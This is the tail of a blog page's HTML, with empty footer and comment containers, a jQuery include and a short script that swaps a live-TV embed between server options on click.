           <div class="post-footer-line post-footer-line-2"> 
            <span class="post-labels"> </span> 
           </div> 
           <div class="post-footer-line post-footer-line-3"> 
            <span class="post-location"> </span> 
           </div> 
          </div> 
         </div> 
         <div class="comments" id="comments"> 
          <a name="comments"></a> 
          <div id="backlinks-container"> 
           <div id="Blog1_backlinks-container"> 
           </div> 
          </div> 
         </div> 
        </div> 
       </div>
      </div> 
     </div> 
     <div class="blog-pager" id="blog-pager"> 
     </div> 
     <div class="clear"></div> 
     <div class="blog-feeds"> 
     </div> 
    </div>
   </div> 
   <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script> 
   <script type="text/javascript">
$('.servers-name li').click(function () {
                    $('.servers-name li').removeClass('active');
                    $(this).addClass('active');
                    var server = $(this).data('server');
                    $('.tv-live-embed').html(servers[server][0]);
                    $('.server').val(servers[server][1]);
                });
</script> 

</body></html>
